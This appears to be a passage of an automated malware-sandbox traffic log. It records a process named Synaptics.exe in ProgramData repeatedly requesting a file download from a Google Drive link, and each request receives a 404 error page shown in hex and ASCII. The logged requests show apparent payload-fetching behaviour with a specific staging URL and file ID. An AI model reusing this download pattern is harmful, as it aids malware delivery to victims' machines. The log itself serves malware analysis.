                                                                                                                                                                                        2022-05-17 11:31:55 UTC574INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 4c 72 33 6e 4f 38 70 72 67 75 42 79 56 37 6b 4a 55 69 4d 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ULr3nO8prguByV7kJUiMHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:55 UTC575INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:55 UTC576INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        19192.168.2.349755142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC56OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC59INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:31 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-R5kSp3pCjAZBS0/PtjhlOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:31 UTC61INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:31 UTC61INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 45 56 74 7a 5a 45 47 4e 53 32 51 4d 63 79 36 45 66 70 72 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kEVtzZEGNS2QMcy6EfprDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:31 UTC62INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:31 UTC62INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        190192.168.2.349962142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC572OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC576INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vBPdZNPOUEwxi9cGvFa4yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:55 UTC577INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 63 43 34 52 4f 7a 4e 46 55 6a 70 56 49 6c 71 33 61 79 6e 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3cC4ROzNFUjpVIlq3aynjw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:55 UTC579INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:55 UTC579INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        191192.168.2.349965142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC576OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC579INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-pE4Wmv5Kj+TLHYsfXcc0SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:55 UTC580INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:55 UTC580INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 63 6d 2b 30 55 35 36 32 68 52 6b 64 4d 6a 41 72 48 48 6e 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ecm+0U562hRkdMjArHHnrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:55 UTC581INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:55 UTC582INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        192192.168.2.349966142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC579OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC582INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-U9HTbBS66xT7nrk25sI6dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:55 UTC583INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 70 6b 47 52 43 38 55 51 6f 76 54 4a 76 4c 62 6c 53 55 55 56 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DpkGRC8UQovTJvLblSUUVg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:55 UTC585INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:55 UTC585INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        193192.168.2.349967142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC582OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC585INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FDPXfx3pB9UyHBItt374Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:55 UTC586INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:55 UTC586INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 36 6f 4e 6c 70 36 58 7a 4b 64 33 70 6a 4e 34 35 53 59 66 37 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
